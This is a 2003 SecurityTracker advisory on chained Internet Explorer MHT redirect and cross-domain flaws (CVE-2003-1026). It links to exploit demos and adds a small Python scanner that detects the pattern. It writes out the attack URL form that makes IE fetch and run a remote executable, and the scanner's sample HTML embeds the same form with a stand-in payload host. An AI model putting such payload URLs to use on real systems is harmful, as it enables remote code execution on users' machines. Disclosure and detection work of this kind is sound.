Microsoft Internet Explorer MHT Redirect Flaws Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID: 1008292
SecurityTracker URL: http://securitytracker.com/id/1008292
CVE Reference: CVE-2003-1026
Updated: Jan 9 2004
Original Entry Date: Nov 25 2003
Impact:
Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Version(s): 6 SP1, possibly earlier versions
Description:
Several vulnerabilities were reported in Microsoft Internet Explorer (IE) involving IE's MHT redirect functions and subframe cross-domain security restrictions. A remote user can create HTML that, when loaded by the target user, will cause arbitrary code to be executed by the target user's browser.
Liu Die Yu reported a method that exploits multiple, previously unreported vulnerabilities in IE to download and execute an arbitrary executable on the target user's system.
A remote user can first create HTML in the Internet security zone that contains an IFRAME that will use MhtRedirParsesLocalFile to parse a local file. The flaw reportedly resides in the code that retrieves files embedded within an MHT file. Using a URL of the format "mhtml:[Mhtml_File_Url]![Original_Resource_Url]", in a manner similar to an HTTP redirect, IE will reportedly attempt to download "Original_Resource_Url" if the file cannot be retrieved from the MHT file ("Mhtml_File_Url").
A demonstration of this method is available at:
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile/MhtRedirParsesLocalFile-Demo/index.html
Then, the remote user can exploit a cross-site scripting flaw to bypass IE's cross-domain security restrictions. A subframe of a malicious HTML document can reportedly load a javascript-protocol URL in such a way that the javascript-protocol URL is executed in the security context of the original malicious HTML document [CVE: CVE-2003-1026]. This is reported to be a variation of a flaw that was ostensibly corrected in a previous Microsoft security fix.
A demonstration of this method is available at:
http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-MyPage.htm
Finally, the remote user can exploit the MhtRedirLaunchInetExe function to download an arbitrary executable from the Internet and execute it in the My Computer zone. This is similar to the MhtRedirParsesLocalFile exploit step. HTML in the My Computer security zone can then point the CODEBASE property of an OBJECT tag with an unused CLSID to the following type of URL:
mhtml:file:///C:\No_SUCH_MHT.MHT![Attaker_PayloadEXE_Url]
IE will then download the file ("Attaker_PayloadEXE_Url") and execute it in the My Computer security zone with the privileges of the target user, the report said.
A demonstration of this final step is available at:
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunchInetExe-Demo.zip
A demonstration of the entire exploit process is available at:
http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.html
The original advisory is available at:
http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc
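As an added example (not part of the advisory or of Liu Die Yu's demos), a small Python scanner that recognizes the "mhtml:[Mhtml_File_Url]![Original_Resource_Url]" redirect form described above inside HTML attribute values and flags the combination the report relies on: a local file: MHT container whose "!" resource points to a remote HTTP host. It also records which attribute carried the URL, so an OBJECT CODEBASE can be told apart from an IFRAME SRC. The sample HTML, the CLSID placeholder and the example.invalid URLs are constructed.

```python
import re
from urllib.parse import urlsplit

# Attribute values of the form mhtml:<Mhtml_File_Url>!<Original_Resource_Url>.
# The attribute name is captured so the finding can say whether the URL sat in
# an OBJECT CODEBASE, an IFRAME SRC, or elsewhere.
ATTR_RE = re.compile(r'(?P<attr>[a-z]+)\s*=\s*["\']?(?P<url>mhtml:[^"\'\s>]+)', re.I)


def split_mhtml(url: str):
    """Split "mhtml:<mht>!<resource>" into (mht, resource); None if not that shape."""
    if not url.lower().startswith("mhtml:") or "!" not in url:
        return None
    mht, resource = url[len("mhtml:"):].split("!", 1)
    return mht, resource


def is_suspicious(mht: str, resource: str) -> bool:
    """The advisory's pattern: a local (file:) MHT container whose '!' resource
    is a remote http(s) URL, i.e. the fetch is redirected away from the local file."""
    return (urlsplit(mht).scheme.lower() == "file"
            and urlsplit(resource).scheme.lower() in ("http", "https"))


def scan_html(html: str):
    """Return one finding per suspicious mhtml redirect found in the HTML."""
    findings = []
    for m in ATTR_RE.finditer(html):
        parts = split_mhtml(m.group("url"))
        if parts and is_suspicious(*parts):
            findings.append({"attr": m.group("attr").lower(),
                             "mht": parts[0], "resource": parts[1]})
    return findings


# Constructed sample (placeholder CLSID and example.invalid hosts): an OBJECT whose
# CODEBASE uses a nonexistent local MHT and a remote EXE, plus a harmless IFRAME
# whose MHT container is itself remote and therefore does not match the pattern.
SAMPLE_HTML = (
    '<object classid="clsid:PLACEHOLDER-CLSID" '
    'codebase="mhtml:file:///C:\\No_SUCH_MHT.MHT!http://example.invalid/payload.exe">'
    '</object>'
    '<iframe src="mhtml:http://example.invalid/a.mht!http://example.invalid/b.html">'
    '</iframe>'
)

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
```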
Impact:
A remote user can create HTML that, when loaded by the target user, will execute arbitrary code with the privileges of the target user.
Solution:
No solution was available at the time of this entry.
The author of the report recommends that you disable Active Scripting in the Internet zone as a workaround.
Vendor URL: www.microsoft.com/technet/security/
Cause:
Access control error, State error
Underlying OS: Windows (Any)
Message History:
None.
Source Message Contents
Subject: [Full-Disclosure] IE Key
IE Key
_________________________________
(.)1stCleanRc (EXPLAIN: "Clean" means there is no disclosed vulnerability)
http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc
(.)MhtRedirParsesLocalFile
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile
(.)MhtRedirLaunchInetExe
http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe
(.)BackToFramedJpu (it may also work on MOZILLA?)
http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu
(.)HijackClickV2
http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2
(.)threadid10008
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008
(.)threadid10008-Note
http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Note.htm
(.)LocalZoneInCache
http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache
(.)execdror6
http://www.safecenter.net/UMBRELLAWEBV4/execdror6
_________________________________
http://clik.to/donatepc
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html